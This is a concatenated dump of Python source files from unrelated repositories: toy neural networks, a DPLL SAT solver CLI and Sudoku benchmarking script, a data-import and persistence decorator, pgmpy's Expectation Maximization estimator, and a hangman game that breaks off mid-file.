class GenericNetwork:
def __init__(self):
# weights and biases
self.W = numpy.random.normal(scale=1.0,size=(2,3)).tolist()
self.V = numpy.random.normal(scale = 1.0, size = (3, 2)).tolist()
self.B = [0., 0., 0.]
self.C = [0., 0.]
# hidden layers
self.K = [0., 0., 0.]
self.H = [0., 0., 0.]
self.Y = [0., 0.]
def forward(self, X, T) -> [list, int]:
self.K = [0., 0., 0.]
self.H = [0., 0., 0.]
self.Y = [0., 0.]
P = [0., 0.]
for j in range(len(self.K)):
for i in range(len(X)):
self.K[j] += self.W[i][j] * X[i]
self.K[j] += self.B[j]
self.H[j] = Activations.sigmoid(self.K[j])
for j in range(len(self.Y)):
for i in range(len(self.H)):
self.Y[j] += self.V[i][j] * self.H[i]
self.Y[j] += self.C[j]
for i in range(len(self.Y)):
P[i] = Activations.softmax(self.Y, i)
L = -(T[0] * numpy.log(P[0]) + T[1] * numpy.log(P[1]))
return P, L
def backward(self, X: list, P: list, T: list) -> [int, int, int, int]:
dLdP = [0.,0.]
dLdY = [0.,0.]
dLdV = [[0.,0.],[0.,0.],[0.,0.]]
dLdC = [0.,0.]
dLdH = [0.,0.,0.]
dLdK = [0.,0.,0.]
dLdW = [[0.,0.,0.],[0.,0.,0.],[0.,0.,0.]]
dLdB = [0., 0., 0.]
for i in range(len(dLdP)):
dLdP[i] = -T[i] / P[i]
dLdY[0]= (dLdP[0] - dLdP[1]) * P[0] * P[1]
dLdY[1]= (dLdP[1] - dLdP[0]) * P[0] * P[1]
for j in range(len(self.Y)):
for i in range(len(self.H)):
dLdV[i][j] = (P[j] - T[j]) * self.H[i]
dLdC[j] = dLdY[j]
for i in range(len(self.H)):
dLdH[i] = dLdY[0] * self.V[i][0] + dLdY[1] * self.V[i][1]
for i in range(len(self.K)):
dLdK[i] = dLdH[i] * self.H[i] * (1 - self.H[i])
for j in range(len(self.K)):
for i in range(len(X)):
dLdW[i][j] = dLdK[j] * X[i]
dLdB[i] = dLdK[i]
return dLdW, dLdB, dLdV, dLdC
def step(self, dLdW, dLdB, dLdV, dLdC, alpha) -> None:
for i in range(len(self.W)):
for j in range(len(self.W[i])):
self.W[i][j] += -alpha * dLdW[i][j]
for i in range(len(self.B)):
self.B[i] -= alpha * dLdB[i]
for i in range(len(self.V)):
for j in range(len(self.V[i])):
self.V[i][j] -= alpha * dLdV[i][j]
for i in range(len(self.C)):
self.C[i] -= alpha * dLdC[i]
```
#### File: deep-net/network/MNISTNetwork.py
```python
import math
import random
import numpy
import pickle
import json
from copy import deepcopy
from datetime import datetime
import numpy as np
class MNISTNetwork:
def __init__(self):
# set initial values
self.W = np.random.normal(size = (784,300))
self.V = np.random.normal(size = (300,10))
self.B = np.zeros(300)
self.C = np.zeros(10)
self.K = None
self.H = None
self.Y = None
def forward(self, X, T):
self.K = np.matmul(X, self.W) + self.B
self.H = self.sigmoid(self.K)
self.Y = np.matmul(self.H, self.V) + self.C
S = self.softmax(self.Y)
L = -np.log(S[T])
return S, L
def backward(self, X, T, S):
dLdS = np.zeros(len(S))
dLdS[T] = -1 / S[T]
dLdY = -S * np.sum(dLdS * S) + dLdS * S
dLdV = np.outer(self.H, dLdY)
dLdC = dLdY
V = self.V
dLdH = np.dot(dLdY, V.T)
dLdK = dLdH * self.H * (1 - self.H)
dLdW = np.outer(X, dLdK)
dLdB = dLdK
return dLdV, dLdC, dLdW, dLdB
def step(self, dLdV, dLdC, dLdW, dLdB, alpha):
self.W -= alpha * dLdW
self.B -= alpha * dLdB
self.V -= alpha * dLdV
self.C -= alpha * dLdC
``` |
{
"source": "1bayezian/pydoku",
"score": 3
} |
#### File: pydoku/pydoku/cli.py
```python
from pydoku.SATSolver import SATSolver
from pydoku.FileHandler import FileHandler
from pydoku.HeuristicType import HeuristicType
from docopt import docopt
from termcolor import colored, cprint
import sys
ARG_KEY_HELP = '--help'
ARG_KEY_SOLVE = '-S'
ARG_KEY_DPLL = '-1'
ARG_KEY_RAND = '-2'
ARG_KEY_MOMS = '-3'
ARG_KEY_FILEPATH = 'FILE'
def error(message: str) -> None:
"""
Prints out an error message in the terminal
Parameters
----------
message : str
message to display the user
Returns
-------
None
See Also
--------
interpret : function interpreting the command line input and providing heuristic directive to the SAT solver
"""
cprint(message, 'red', attrs = ['bold'], file = sys.stderr)
def success(message: str) -> None:
"""
Prints out a success message in the terminal
Parameters
----------
message : str
message to display the user
Returns
-------
None
See Also
--------
interpret : function interpreting the command line input and providing heuristic directive to the SAT solver
"""
cprint(message, 'green', attrs = ['bold'], file = sys.stderr)
def interpret():
"""
Interprets command line input and provides appropriate input to the SAT solver.
If our SAT solver is able to find a suitable solution to the input CNF, the solution is written to the output file in DIMACS format.
Returns
-------
None
See Also
--------
success : function printing success messages to terminal
error : function printing error messages to terminal
"""
args = docopt(__doc__)
if args[ARG_KEY_SOLVE] is None:
error('Invalid input for command line utility.')
exit(0)
if args[ARG_KEY_DPLL]:
heuristic = HeuristicType.STANDARD_DPLL
elif args[ARG_KEY_RAND]:
heuristic = HeuristicType.RANDOM_LITERAL
elif args[ARG_KEY_MOMS]:
heuristic = HeuristicType.MAX_OCCURRENCES_MIN_SIZE
else:
error('Invalid heuristic provided as input.')
exit(0)
filepath = args[ARG_KEY_FILEPATH]
output_filepath = f'{filepath}.out'
try:
cnf = FileHandler.parse(filepath)
except:
error('Error: An error occurred while reading the file provided.')
exit(0)
try:
solver = SATSolver()
satisfied, assignments, backtracks = solver.solve(cnf, heuristic)
if satisfied:
FileHandler.output(output_filepath, assignments)
success('Satisfiable solution for the formula found.')
success(f'Number of backtracks: {backtracks}')
success(f'Truth assignments satisfying the CNF can be found here: {output_filepath}')
else:
error('Formula provided is unsatisfiable.')
error(f'Number of backtracks: {backtracks}')
except:
error('Error: An error occurred while solving the provided CNF formula.')
exit(0)
if __name__ == "__main__":
interpret()
```
#### File: pydoku/test_scripts/create_report.py
```python
from pydoku.SATSolver import SATSolver
from pydoku.FileHandler import FileHandler
from pydoku.HeuristicType import HeuristicType
import time
from copy import deepcopy
import math
import csv
def to_dimacs(sudoku: str) -> str:
"""
Takes in a string defining a sudoku as parameter and encodes it into dimacs
Parameters
----------
sudoku: string
a definition of the puzzle in dimacs format
Returns
-------
string
returns string describing the sudoku puzzle in dimacs format
"""
sudoku_values = []
sudoku = sudoku.strip()
side = int(math.sqrt(len(sudoku)))
for i, value in enumerate(sudoku):
if value != '.':
row = (i // side) + 1
column = (i % side) + 1
rcv = f'{row}{column}{value} 0'
sudoku_values.append(rcv)
return '\n'.join(sudoku_values)
def evaluate(cnf: list, assignments: dict) -> bool:
"""
Returns a randomly selected literal from the current CNF
Parameters
----------
cnf : list
a list of clauses defining a CNF
assignments : list
a list of clauses defining a CNF
Returns
-------
bool
returns true if the assignments provided satisfy the CNF
"""
for clause in cnf:
valid = True
for literal in clause:
atom = literal
if literal[0] == '-':
atom = literal[1:len(literal)]
valid = valid or assignments[atom]
if not valid:
return False
return True
if __name__ == '__main__':
sizes = [4, 9]
heuristic_ids = [ 1, 2, 3 ]
for size in sizes:
sudoku_examples = f'pydoku/test_files/{size}x{size}/examples.txt'
sudoku_rules = f'pydoku/test_files/{size}x{size}/rules.txt'
sudoku_file = f'pydoku/test_files/{size}x{size}/dimacs.txt'
rules = FileHandler.parse(sudoku_rules)
examples = open(sudoku_examples, 'r')
with open(f'pydoku/test_files/reports/{size}x{size}.csv', 'w', newline = '') as file:
csv_writer = csv.writer(file)
csv_writer.writerow([ 'Heuristic', 'Size', 'Satisfied', 'Backtracks', 'Splits', 'Run Time' ])
for line in examples:
dimacs = to_dimacs(line)
# write the dimacs to a file, this will allow us to mimic reading the CNF from files
write_file = open(sudoku_file, '+w')
write_file.write(dimacs)
write_file.close()
sudoku = FileHandler.parse(sudoku_file)
cnf = sudoku + rules
for heuristic_id in heuristic_ids:
start_time = time.time()
heuristic = HeuristicType(heuristic_id)
solver = SATSolver()
satisfied, result_assignments, backtracks, splits = solver.solve(deepcopy(cnf), heuristic)
# check if the returned assignments are valid
valid = evaluate(cnf, result_assignments)
if valid:
print(f'DPLL Output: Satisfied. Backtracks: {backtracks}')
else:
print('DPLL Output: Unsatisfied')
runtime = time.time() - start_time
print('--- %s seconds ---' % runtime)
print('--- %s backtracks ---' % backtracks)
csv_writer.writerow([heuristic, f'{size}x{size}', satisfied, backtracks, splits, runtime])
file.close()
``` |
{
"source": "1ber/muriki",
"score": 2
} |
#### File: muriki/muriki/DataEntity.py
```python
import csv
import re
import sys
from decimal import *
from gettext import gettext as _
from muriki.DataProperty import *
import traceback
#~ ( DataProperty, generate_error_message, data_property
#~ , auto_data_property, Sql)
#import psycopg2 // will be needed if postgre database is used
#from .DataProperty import *
"""
This utilty is intended to use to ease the import of data from files and
the persisntence into databases. Options are made to make those
resources easy to insert into existent code (using decorators)
and writing a minimum of code.
"""
def data_entity(
cls=None,
database_engine=None,
database_server_address=None,
database_user=None,
database_password=<PASSWORD>,
database_name=None,
database_port=None,
):
"""
This class decorator is to be used to allow an class to be easily
used to import data from files and persist this data
:param cls: The class to be decorated, passed automatically to the
decorator
:param database_engine: Database engine to be used to
persist data, see the DataProperty.Sql.DatabaseEngine
:param database_server_address: network address of the
server that will be used to persist data
:param database_user: user to persist data, if necessary
:param database_password: password to grant access to
the user on the database
:param database_port: TCP port of the database server to
be used in the connection
"""
@classmethod
def create_table(cls):
"""
Simply use the execute_sql function to create int the database
that correspond to the class
:param cls: The class passed by the decorator
"""
cls.execute_sql(cls.create_table_sql())
@classmethod
def execute_sql(cls, sql_statements=[], values=None, commit=True):
"""
Execute arbitrary sql code, the code is generated in other functions
based on the sqlEngine parameter
:param cls: The class passed by the decorator
"""
try:
## TODO, this is UGLY, need to separate in two functions, one to
## single and other to multiple statements
## also needs a better aproach for multiple value sets
## and native multiple execution
if( type( sql_statements ) == str ):
tmp = sql_statements
sql_statements=list()
sql_statements.append( tmp )
for sql_statement in sql_statements:
if ( values is not None ):
result = cls._cursor.execute(sql_statement, values)
else:
result = cls._cursor.execute(sql_statement )
cls._connection.commit()
except Exception as e:
#~ traceback.print_exc()
print ( str( e.args ) )
raise Exception(
'Sql Error:' + str(sql_statements)+',values:'+str(values)+':'
) from e
#~ raise Exception(
#~ 'Sql Error:' + (
#~ cls._cursor .mogrify(sql, values).decode('utf-8'))
#~ ) from e
#~ return result
@classmethod
def sql_columns(cls):
"""
search the properties decorated, get those with sql_column_type
defined and put in the correspondent list. The separation is
needed to create the columns in a certain order (keys, indexes
,data) to improve performance
:param cls: The class passed by the decorator
"""
columns = {
Sql.ColumnType.AUTO_INCREMENT: [],
Sql.ColumnType.PRIMARY_KEY: [],
Sql.ColumnType.INDEX: [],
Sql.ColumnType.SIMPLE: [],
}
for k, cls_member in vars(cls).items():
if (not (cls_member is None)
and isinstance(cls_member, DataProperty)
and ( getattr( cls_member, 'sql_column_type', None)
is not None )
):
columns[cls_member.sql_column_type].append(
cls_member)
return columns
@classmethod
def fl_properties(cls):
"""
search the properties decorated, get those with fl_start
member defined, order by this member and return the list.
The order is important in a fixed length import
:param cls: The class passed by the decorator
"""
flp = [p for p in vars(cls).values()
if ((p is not None) and isinstance(p, DataProperty)
and not(p.fl_start is None))
]
flp.sort(key=lambda f: f.fl_start)
return flp
@classmethod
def csv_properties(cls):
"""
search the properties decorated, get those with csv_position
member defined, order by this member and return the list.
The order is important in a fixed length import
:param cls: The class passed by the decorator
"""
csvp = [p for p in vars(cls).values()
if ((p is not None) and isinstance(p, DataProperty)
and not( getattr( p, 'csv_position', None ) is None))
]
csvp.sort(key=lambda f: f.csv_position)
return csvp
@classmethod
def create_table_sql(cls):
"""
Generates the string (based on the properties passed to the
decorator) used to create the corresponding table
:param cls: The class passed by the decorator
"""
sql_statements=[]
tmp = cls._database_engine.create_table.value + \
' ' + (cls.__name__.lower() + ' ( ')
aditional_primary_key = ''
## The sql columns ared inserted in a specific order
## to improve performance
for c in cls.sql_columns()[Sql.ColumnType.AUTO_INCREMENT]:
aditional_primary_key = aditional_primary_key + c._name + ', '
tmp = tmp + get_sql_definition(cls, c) + ', '
for c in cls.sql_columns()[Sql.ColumnType.PRIMARY_KEY]:
tmp = tmp + get_sql_definition(cls, c) + ', '
aditional_primary_key = aditional_primary_key + c._name + ', '
for c in cls.sql_columns()[Sql.ColumnType.INDEX]:
tmp = tmp + get_sql_definition(cls, c) + ', '
sql_statements.append(
cls._database_engine.index.value.format(
cls.__name__.lower(),c._name.lower())
)
for c in cls.sql_columns()[Sql.ColumnType.SIMPLE]:
tmp = tmp + get_sql_definition(cls, c) + ', '
## format the string inserting aditional keys and indexes
## clauses
tmp = (tmp
+ ((cls._database_engine.primary_key.value
.format(aditional_primary_key))
if aditional_primary_key
else '')
+ ');')
#clean the unused extra commas
tmp = re.sub(',\s*\)', ' )', tmp)
sql_statements.insert( 0, tmp )
return sql_statements
@classmethod
def insert_sql(cls):
"""
Generates the string (based on the properties passed to the
decorator) used to create one register on the database, this
register will 'fit' in a database created by create_table_sql
function
:param cls: The class passed by the decorator
"""
names = []
auto_increment_field_name = ''
for k, sql_columns_by_type in cls.sql_columns().items():
for sql_column in sql_columns_by_type:
if(
sql_column.sql_column_type
!=Sql.ColumnType.AUTO_INCREMENT
):
names.append(sql_column._name)
#~ else:
#~ auto_increment_field_name = sql_column._name
insert_sql = (
cls._database_engine.insert.value.format(
cls.__name__.lower()
,', '.join(names)
,(
(str( cls._database_engine.value_place_holder.value)+',')
* len(names)
)
)
)
insert_sql = re.sub(',\s*\)', ' )', insert_sql)
return insert_sql
@classmethod
def batch_insert(cls, instances=[]):
"""
Creates a 'huge' string to insert a lot of registers in just one
execution.
:param cls: The class passed by the decorator
:para instances: a list of the objects to be persisted
"""
batch_sql = ''
for instance in instances:
batch_sql = batch_sql + instance.insert_sql_with_values()
cls.execute_sql(batch_sql)
#TODO - Define what to do when there is an error in a property (add parameter to choose?)
@classmethod
def create_from_csv(
cls,
file_name=None,
headers=False,
delimiter='\t',
quotechar=None):
"""
Creates a list of instances of objects from the defined entity
from an csv file
:param cls: The class passed by the decorator
:param file_name: The name of the file (csv formatted)
:param headers: Wheter the file has a first row with column names
:param delimiter: The delimiter of the fields in the csv file
:param quotechar: The char used to 'enclose' the values, it's
needed to allow the delimiter to occur inside the fields
"""
#~ with (open( file_name ) as csv_file:
#~ csv_reader = csv.DictReader( fieldnames= )
entities = []
csv_file = open(file_name)
csv_reader = csv.reader(
csv_file
, delimiter=delimiter
, quotechar=quotechar
)
if ( headers ):
next( csv_reader, None )
for row_number, row in enumerate( csv_reader ):
entity = cls()
entity.properties_from_csv( row )
entities.append( entity )
#~ raise Exception(
#~ 'Error creating entities from csv file, line:'
#~ + str( row_number )
#~ +':'+ str(row)+':'
#~ ) from e
return ( entities )
def properties_from_csv(self, values=None):
"""
Set the values of properties of an object (self) with a list of
:param cls: The class passed by the decorator
:param values: The list of values to be setted in the properties
"""
try:
for p in self.__class__.csv_properties():
setattr(self, p._name, values[ p.csv_position] )
except Exception as e:
raise Exception(
'Error reading property: '
+'class properties length:'
+ str( len( self.__class__.csv_properties() ) )
+ ', values length:' + str( len( values ) )
+ ', property: '+str( p )
+ ' from values: '
+ str( values )
) from e
@classmethod
def create_from_fl(cls, file_name=None, encoding="utf-8"
, fl_line_length=None , fl_regex=None ):
"""
Create a list of objects from the type (cls) reading the values from
a fixed length file
:param cls: The class passed by the decorator
:param file_name: The name (and location) of the file to be
readed
:param encoding: The encoding to be used to read the file
:param fl_line_length: Chunk size to be readed and converted
to a line in files with no line neds
:param fl_regex: Regex to be used to identify lines with
registers to be imported into instances of the
specified class
"""
data_lines = []
if ( fl_line_length is not None ):
with open(file_name, "rb") as f:
for chunk in iter(lambda: f.read( fl_line_length ), b""):
data_lines.append( chunk.decode( encoding ) )
else:
fl_file = open(file_name, 'r', encoding=encoding)
for row in fl_file:
data_lines.append( row )
entities=[]
for line_number, line in enumerate( data_lines ):
if ( fl_regex is None or re.match( fl_regex, line) ):
entity = cls()
entity.properties_from_fl( line )
entities.append(entity)
return entities
def properties_from_fl(self, string=None):
"""
Set the values of the properties from a fixed length string
:param self: The object which the values will be set
:param string: The string where the values will be readed
"""
for p in self.__class__.fl_properties():
tmp = string[p.fl_start: (p.fl_start + p.fl_length)].strip()
setattr(self, p._name, tmp)
def insert_sql_with_values(self):
"""
Generate an sql string with the values, read to be inserted in
the database
"""
values = []
for k, sql_columns_by_type in self.__class__.sql_columns().items():
for sql_column in sql_columns_by_type:
if(sql_column.data_type != auto_increment):
values.append(self.get_property_value(sql_column))
## TODO - Only for Postgre, needs rewriting for other DBs
return (
self.__class__._cursor.mogrify(
self.__class__.insert_sql(),
values).decode('utf-8'))
def insert(self, commit=True):
"""
Insert the values of the object (self) in the database, note that
:param commit: commit directly after executing the sql
"""
values = []
for k, sql_columns_by_type in self.__class__.sql_columns().items():
for sql_column in sql_columns_by_type:
if(
sql_column.sql_column_type
!=Sql.ColumnType.AUTO_INCREMENT
):
values.append(self.get_property_value(sql_column))
_id = self.__class__.execute_sql(
self.__class__.insert_sql(), values, commit)
return _id
def get_property_value(self, data_property=None):
"""
Read the value of a sql column, if can't read the value, and there
is an default, the default is returned, None otherwise
:param data_property: Property to be readed
"""
value = getattr(self, data_property._name,
getattr(data_property, 'default_value', None)
)
if(
type( value ) == Decimal
and value == Decimal( 'NaN' )
):
return None ## ?? TODO Assume None = NaN = Null
else:
if ( self.__class__._database_engine==Sql.Sqlite ):
return str( value )
else:
return value
def get_sql_definition(cls=None, cls_member=None):
"""
Return the sql definition of a givern member of the class
:param cls: The class passed by the decorator
:param cls_member: The member which the sql should be generated
"""
length=None
if(cls_member.sql_column_type
== Sql.ColumnType.AUTO_INCREMENT):
return (cls._database_engine.auto_increment.value
.format(cls_member._name))
else:
python_data_type = getattr(cls_member, 'data_type', str)
sql_data_type = (cls._database_engine[
python_data_type.__name__].value)
if(python_data_type == str):
length = (
getattr(cls_member, 'max_length',
getattr(cls_member, 'length',
getattr(cls_member, 'fl_length',
0 )
)
)
)
if(length >= BIG_TEXT_MIN_LEN):
sql_data_type = (cls._database_engine.bigtext.value)
elif( length > 0 ):
sql_data_type = (
cls._database_engine.str.value
+ '('+str( length ) + ')'
)
else:
sql_data_type = ( cls._database_engine.text.value )
#~ elif(length > 0):
#~ sql_data_type = (sql_data_type + '('
#~ + str(length) + ')')
elif(python_data_type == int):
max_value = getattr(cls_member, 'max_exclusive',
getattr(cls_member, 'max_inclusive', 0)
)
if(max_value > INT_MAX_VALUE):
sql_data_type = (cls._database_engine.biginteger.value)
try:
if(cls_member.fl_length > 9):
sql_data_type = (cls._database_engine.biginteger.value)
except BaseException:
pass
elif(python_data_type == Decimal):
total_digits = getattr(
cls_member, 'total_digits', DEFAULT_DECIMAL_TOTAL_DIGITS)
fraction_digits = getattr(
cls_member,
'fraction_digits',
DEFAULT_DECIMAL_FRACTION_DIGITS)
sql_data_type = (
sql_data_type + '(' + str(total_digits) + ', '
+ str(fraction_digits) + ')')
if( length is not None ):
return sql_data_type.format(cls_member._name , length )
else:
return sql_data_type.format(cls_member._name )
@classmethod
def fl_properties_names( cls ):
fl_p_names=list()
for fl_p in cls.fl_properties():
fl_p_names.append( fl_p._name )
return fl_p_names
def values( self ):
p_values=list()
for prop in self.__class__.fl_properties():
p_values.append( self.get_property_value( prop) )
return p_values
@classmethod
def write_csv_file(
cls,
file_name=None,
headers=True,
delimiter='\t',
quotechar='"',
instances=list() ):
"""
Write a series of instances of the decorated class into a
csv file
"""
with open( file_name, 'w', ) as csv_file:
csv_writer = csv.writer(
csv_file,
delimiter=delimiter,
quotechar=quotechar,
quoting=csv.QUOTE_MINIMAL
)
if( headers ):
header_names=list()
for csv_prop in cls.csv_properties():
header_names.append( csv_prop._name )
csv_writer.writerow( header_names )
for instance in instances:
csv_writer.writerow( instance.values() )
if (cls is None):
## This is the chunck that really decorates the class, inserting the
## various methods defined above
def wrapper(cls):
cls._database_engine = database_engine
cls.sql_columns = sql_columns
cls.create_table_sql = create_table_sql
cls.create_table = create_table
cls.execute_sql = execute_sql
cls.insert = insert
cls.get_property_value = get_property_value
cls.insert_sql = insert_sql
cls.batch_insert = batch_insert
cls.insert_sql_with_values = insert_sql_with_values
cls.create_from_csv = create_from_csv
cls.properties_from_fl = properties_from_fl
cls.create_from_fl = create_from_fl
cls.fl_properties = fl_properties
cls.create_from_csv = create_from_csv
cls.properties_from_csv=properties_from_csv
cls.csv_properties = csv_properties
cls.fl_properties_names=fl_properties_names
cls.values = values
cls.write_csv_file=write_csv_file
if not(database_name is None):
if( cls._database_engine == Sql.Mysql ):
import mysql.connector
cls._connection = mysql.connector.connect(
database=database_name,
user=database_user,
password=<PASSWORD>,
host=database_server_address,
port=database_port)
cls._cursor = cls._connection.cursor()
# TODO - Connect to the mysql database
pass
elif( cls._database_engine == Sql.Postgresql ):
# TODO - Maybe not the best strategy
import psycopg2
cls._connection = psycopg2.connect(
dbname=database_name,
user=database_user,
password=<PASSWORD>,
host=database_server_address,
port=database_port)
cls._cursor = cls._connection.cursor()
elif( cls._database_engine == Sql.Sqlite ):
# TODO - Maybe not the best strategy
import sqlite3
cls._connection = sqlite3.connect(database=database_name )
cls._cursor = cls._connection.cursor()
return cls
return wrapper
return cls
``` |
{
"source": "1betatsu/pgmpy",
"score": 3
} |
#### File: pgmpy/estimators/EM.py
```python
import warnings
from itertools import product, chain
import numpy as np
import pandas as pd
from tqdm.auto import tqdm
from pgmpy.estimators import ParameterEstimator, MaximumLikelihoodEstimator
from pgmpy.models import BayesianNetwork
from pgmpy.factors.discrete import TabularCPD
from pgmpy.global_vars import SHOW_PROGRESS
class ExpectationMaximization(ParameterEstimator):
def __init__(self, model, data, **kwargs):
"""
Class used to compute parameters for a model using Expectation
Maximization (EM).
EM is an iterative algorithm commonly used for
estimation in the case when there are latent variables in the model.
The algorithm iteratively improves the parameter estimates maximizing
the likelihood of the given data.
Parameters
----------
model: A pgmpy.models.BayesianNetwork instance
data: pandas DataFrame object
DataFrame object with column names identical to the variable names
of the network. (If some values in the data are missing the data
cells should be set to `numpy.NaN`. Note that pandas converts each
column containing `numpy.NaN`s to dtype `float`.)
state_names: dict (optional)
A dict indicating, for each variable, the discrete set of states
that the variable can take. If unspecified, the observed values in
the data set are taken to be the only possible states.
complete_samples_only: bool (optional, default `True`)
Specifies how to deal with missing data, if present. If set to
`True` all rows that contain `np.NaN` somewhere are ignored. If
`False` then, for each variable, every row where neither the
variable nor its parents are `np.NaN` is used.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianNetwork
>>> from pgmpy.estimators import ExpectationMaximization
>>> data = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 5)),
... columns=['A', 'B', 'C', 'D', 'E'])
>>> model = BayesianNetwork([('A', 'B'), ('C', 'B'), ('C', 'D'), ('B', 'E')])
>>> estimator = ExpectationMaximization(model, data)
"""
if not isinstance(model, BayesianNetwork):
raise NotImplementedError(
"Expectation Maximization is only implemented for BayesianNetwork"
)
super(ExpectationMaximization, self).__init__(model, data, **kwargs)
self.model_copy = self.model.copy()
def _get_likelihood(self, datapoint):
"""
Computes the likelihood of a given datapoint. Goes through each
CPD matching the combination of states to get the value and multiplies
them together.
"""
likelihood = 1
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for cpd in self.model_copy.cpds:
scope = set(cpd.scope())
likelihood *= cpd.get_value(
**{key: value for key, value in datapoint.items() if key in scope}
)
return likelihood
def _compute_weights(self, latent_card):
"""
For each data point, creates extra data points for each possible combination
of states of latent variables and assigns weights to each of them.
"""
cache = []
data_unique = self.data.drop_duplicates()
n_counts = self.data.groupby(list(self.data.columns)).size().to_dict()
for i in range(data_unique.shape[0]):
v = list(product(*[range(card) for card in latent_card.values()]))
latent_combinations = np.array(v, dtype=int)
df = data_unique.iloc[[i] * latent_combinations.shape[0]].reset_index(
drop=True
)
for index, latent_var in enumerate(latent_card.keys()):
df[latent_var] = latent_combinations[:, index]
weights = df.apply(lambda t: self._get_likelihood(dict(t)), axis=1)
df["_weight"] = (weights / weights.sum()) * n_counts[
tuple(data_unique.iloc[i])
]
cache.append(df)
return pd.concat(cache, copy=False)
def _is_converged(self, new_cpds, atol=1e-08):
"""
Checks if the values of `new_cpds` is within tolerance limits of current
model cpds.
"""
for cpd in new_cpds:
if not cpd.__eq__(self.model_copy.get_cpds(node=cpd.scope()[0]), atol=atol):
return False
return True
def get_parameters(
self,
latent_card=None,
max_iter=100,
atol=1e-08,
n_jobs=-1,
seed=None,
show_progress=True,
):
"""
Method to estimate all model parameters (CPDs) using Expecation Maximization.
Parameters
----------
latent_card: dict (default: None)
A dictionary of the form {latent_var: cardinality} specifying the
cardinality (number of states) of each latent variable. If None,
assumes `2` states for each latent variable.
max_iter: int (default: 100)
The maximum number of iterations the algorithm is allowed to run for.
If max_iter is reached, return the last value of parameters.
atol: int (default: 1e-08)
The absolute accepted tolerance for checking convergence. If the parameters
change is less than atol in an iteration, the algorithm will exit.
n_jobs: int (default: -1)
Number of jobs to run in parallel. Default: -1 uses all the processors.
seed: int
The random seed to use for generating the intial values.
show_progress: boolean (default: True)
Whether to show a progress bar for iterations.
Returns
-------
Estimated paramters (CPDs): list
A list of estimated CPDs for the model.
Examples
--------
>>> import numpy as np
>>> import pandas as pd
>>> from pgmpy.models import BayesianNetwork
>>> from pgmpy.estimators import ExpectationMaximization as EM
>>> data = pd.DataFrame(np.random.randint(low=0, high=2, size=(1000, 3)),
... columns=['A', 'C', 'D'])
>>> model = BayesianNetwork([('A', 'B'), ('C', 'B'), ('C', 'D')], latents={'B'})
>>> estimator = EM(model, data)
>>> estimator.get_parameters(latent_card={'B': 3})
[<TabularCPD representing P(C:2) at 0x7f7b534251d0>,
<TabularCPD representing P(B:3 | C:2, A:2) at 0x7f7b4dfd4da0>,
<TabularCPD representing P(A:2) at 0x7f7b4dfd4fd0>,
<TabularCPD representing P(D:2 | C:2) at 0x7f7b4df822b0>]
"""
# Step 1: Parameter checks
if latent_card is None:
latent_card = {var: 2 for var in self.model_copy.latents}
# Step 2: Create structures/variables to be used later.
n_states_dict = {key: len(value) for key, value in self.state_names.items()}
n_states_dict.update(latent_card)
for var in self.model_copy.latents:
self.state_names[var] = list(range(n_states_dict[var]))
# Step 3: Initialize random CPDs if starting values aren't provided.
if seed is not None:
np.random.seed(seed)
cpds = []
for node in self.model_copy.nodes():
parents = list(self.model_copy.predecessors(node))
cpds.append(
TabularCPD.get_random(
variable=node,
evidence=parents,
cardinality={
var: n_states_dict[var] for var in chain([node], parents)
},
state_names={
var: self.state_names[var] for var in chain([node], parents)
},
)
)
self.model_copy.add_cpds(*cpds)
if show_progress and SHOW_PROGRESS:
pbar = tqdm(total=max_iter)
# Step 4: Run the EM algorithm.
for _ in range(max_iter):
# Step 4.1: E-step: Expands the dataset and computes the likelihood of each
# possible state of latent variables.
weighted_data = self._compute_weights(latent_card)
# Step 4.2: M-step: Uses the weights of the dataset to do a weighted MLE.
new_cpds = MaximumLikelihoodEstimator(
self.model_copy, weighted_data
).get_parameters(n_jobs=n_jobs, weighted=True)
# Step 4.3: Check of convergence and max_iter
if self._is_converged(new_cpds, atol=atol):
if show_progress and SHOW_PROGRESS:
pbar.close()
return new_cpds
else:
self.model_copy.cpds = new_cpds
if show_progress and SHOW_PROGRESS:
pbar.update(1)
return cpds
``` |
{
"source": "1BitsGit/hangmanpy",
"score": 3
} |
#### File: 1BitsGit/hangmanpy/main.py
```python
from colorama import Fore
from random_word import RandomWords
# CREDITS TO https://github.com/vaibhavsingh97/random-word created by vaibhavsingh97 for the random word package!
# Give them all the love for making my life SO EASY If you are getting errors run "pip install random_word" and then
# "pip install yaml" in your terminal
while True:
in_game = False
print(f"""
{Fore.CYAN}┌──────────────────────────────────────────────────────────────────────────────────────┐
_
| |__ __ _ _ __ __ _ _ __ ___ __ _ _ __
| '_ \ / _` | '_ \ / _` | '_ ` _ \ / _` | '_
| | | | (_| | | | | (_| | | | | | | (_| | | | |
|_| |_|\__,_|_| |_|\__, |_| |_| |_|\__,_|_| |_|
|___/
{Fore.CYAN}└──────────────────────────────────────────────────────────────────────────────────────┘
{Fore.RESET}Type{Fore.LIGHTRED_EX} "help" {Fore.RESET}in any case for a help menu.
{Fore.LIGHTMAGENTA_EX}Made by [name omitted lolol] for [my class]! (v1.0)
{Fore.RESET}
""")
def custom_input(message):
print(f"{Fore.WHITE}[{Fore.LIGHTGREEN_EX}>>>{Fore.WHITE}] {Fore.RESET}", end="")
input_return = input(message)
return input_return
# vars (6 lives for head body two arms two legs)
guess = ""
lives = 6
hints = 0
egg = False
r = RandomWords()
word = r.get_random_word(hasDictionaryDef="true", maxLength=7, minLength=3).upper()
menu = len(word) * "_ "
guessed_letters = []
completed = False
# int line 4 usr
while in_game is False:
initial_input = custom_input("").lower()
if initial_input == "help":
print("""Help menu:
**note, case doesn't matter.
start -> starts the game
settings -> modify your settings
quit -> leave the game
leave -> exit the settings menu""")
elif initial_input == "debug":
print(word)
elif initial_input == "rr":
word = r.get_random_word(hasDictionaryDef="true", maxLength=7, minLength=3).upper()
print(word)
elif initial_input == "egg = true":
egg = True
# hi !
elif initial_input == "start":
print(f"{Fore.LIGHTGREEN_EX}You're in game now! Type a letter to begin.{Fore.RESET}")
in_game = True
elif initial_input == "settings":
print(f"""Settings are as follow:
You have: {lives} lives.
You have: {hints} hints.
type "leave" to exit settings, type hints/lives to change their value""")
while True:
setting_input = custom_input("").lower()
if setting_input == "leave":
print("leaving")
break
elif setting_input == "quit:":
quit("Thanks for playin!")
elif setting_input == "settings":
print("You're already in settings! Here are your settings though: (type leave to leave)")
print(f"""Settings are as follow:
You have: {lives} lives.
